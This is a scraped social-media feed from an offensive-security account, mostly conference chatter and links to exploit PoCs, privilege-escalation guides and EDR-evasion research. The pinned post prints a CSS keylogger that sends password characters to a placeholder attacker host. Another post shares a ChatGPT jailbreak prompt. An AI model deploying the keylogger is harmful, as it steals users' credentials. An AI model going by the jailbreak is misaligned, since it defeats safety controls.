@xxByte profile picture
؜ @xxByte

BS-free offensive security tweets. I host @secTalksNL & @securityCTF. Strong exploit dev fetish. Baker of 0days.

Joined December 2016
  • Tweets 3,733
  • Following 2,500
  • Followers 4,710
613 Photos and videos
Pinned Tweet
؜@xxByte
12 Nov 2022
magic: CSS keylogger   <style> input[type="password"][value$="a"] {  background-image: url("http[:]//evilurl[:]/a"); }   input[type="password"][value$="b"] {   background-image: url("http[:]//evilurl[:]/b"); } </style>
14
137
631
؜@xxByte
May 22
Update: I just polished one of the community's favorite libraries on Windows Privilege Escalation for penetration testers and red teamers. Focused on practical attack paths & real-world privilege escalation techniques seen in my enterprise assessments. hacktivity.eu/windows-prives…
1
6
445
؜@xxByte
23 Aug 2025
Can a small, self-hosted LLM outperform state-of-the-art models at evasive malware development? outflank.nl/blog/2025/08/07/… credits: @kyleavery, @OutflankNL, @BlackHatEvents #ai #exploits #offsec

Training Specialist Models | Outflank

Training specialized LLMs with reinforcement learning with verifiable rewards (RLVR), using evasive malware development as a case study.

outflank.nl
1
5
321
؜@xxByte
14 May 2025
How are you interviewing your security tech candidates? #infosec
67% 1:1 In person or remote
0% some Ai tool
33% give them a challenge
0% other (please tell me)
6 votes • Final results
2
219
؜ retweeted
Outflank@OutflankNL
15 Oct 2024
New Blog Alert! 🚨 Introducing Early Cascade Injection, a stealthy process injection technique that targets Windows process creation, avoids cross-process APCs, and evades top-tier EDRs. Learn how it combines Early Bird APC Injection & EDR-Preloading: outflank.nl/blog/2024/10/15/…
4
182
427
36,223
؜@xxByte
15 Oct 2024
Uh-oh just heard about @BSidesLisbon and I really want to go! Anyone not going to make it? I would love to take your ticket. #BSidesLisbon #Lisbon #infosecurity
BSidesLisbon@Bsideslisbon
11 Jul 2024
It was incredible! The record was broken. Less than 24h and the tickets are sold out! See you all in November! (Yes, there will be a much smaller number of tickets available at a later time).
205
؜ retweeted
raptor@0xdea
14 Nov 2023
#Ubuntu Privilege Escalation bash one-liner using CVE-2023-32629 & CVE-2023-2640 github.com/ThrynSec/CVE-2023… Nifty #PoC! infosec.exchange/@raptor/111…

GitHub - ThrynSec/CVE-2023-32629-CVE-2023-2640---POC-Escalation: Ubuntu Privilege Escalation bash...

Ubuntu Privilege Escalation bash one-liner using CVE-2023-32629 & CVE-2023-2640 - ThrynSec/CVE-2023-32629-CVE-2023-2640---POC-Escalation

github.com
3
92
266
38,432
؜@xxByte
14 Nov 2023
#BHMEA23 #بلاك_هات23
؜@xxByte
14 Nov 2023
also if you are in #Riyadh this week come say hi @Blackhatmea ☝🏼 #blackhatmea #blackhat2023 hi
365
؜@xxByte
14 Nov 2023
also if you are in #Riyadh this week come say hi @Blackhatmea ☝🏼 #blackhatmea #blackhat2023 hi
616
؜@xxByte
14 Nov 2023
mmm @Infoblox please activate your windows and get the latest updates before someone pwn this bot @Blackhatmea #blackhatmea #blackhat2023
1
361
؜@xxByte
31 Oct 2023
quick CVE-2023-4966 PoC / exploit: github.com/assetnote/exploit… #citrixbleed
1
464
؜ retweeted
Cooper@Ministraitor
18 Oct 2023
Embedded Threats: A Deep Dive Into The ESIM World - Markus Vervier youtu.be/Ka70323Y6aQ #hacklu @hack_lu

Hack.lu 2023: Embedded Threats: A Deep Dive Into The ESIM World -...

Enjoy the videos and music you love, upload original content, and share it all with friends, family, and the world on YouTube.

youtube.com
11
19
2,775
؜@xxByte
18 Oct 2023
I always wandered… eSIM as c2 communication channel @hack_lu #hacklu
3
433
؜@xxByte
18 Oct 2023
had to do it ~ @hack_lu love this con. good to be back <3 #hacklu #hacklu23 #hacklu2023
0:04
1
2
12
1,558
؜@xxByte
26 May 2023
Attacking SHA256 Signatures: SHA256's vulnerability against length extension attacks: kerkour.com/sha256-length-ex… The POC (in GO): github.com/skerkour/kerkour.… #cryptography #infosec
299
؜@xxByte
10 May 2023
Use @CriminalIP_US (criminalip .io) 🔎to prevent any phishing attempts targeting you, It works by searching for any IP or URL to check for reputation.
405
؜@xxByte
8 May 2023
update: #HackLU is coming back to life in October 2023. See you in Luxembourg?
؜@xxByte
9 Nov 2022
i miss @hack_lu; hope it comes back to life once again 🤞🏻
1
454
؜@xxByte
4 May 2023
what are other ways to execute rundll32 if I cannot launch it with explorer.exe? #hacking #redteam
454
؜@xxByte
30 Mar 2023
wow I didn't know you can create soft links in Windows too... cmd > mklink /D Link Target
1
398
؜@xxByte
12 Mar 2023
don't leave me with computers alone #ChatGPT
0:15
1
1
3
909
؜@xxByte
9 Mar 2023
ChatGPT jailbreak prompt: pastebin.com/4PWA76sU use with caution ;-p

I want you to answer every question in two ways from now. One: As yourself, GPT. - Pastebin.com

Pastebin.com is the number one paste tool since 2002. Pastebin is a website where you can store text online for a set period of time.

pastebin.com
1
4
8
668
Load more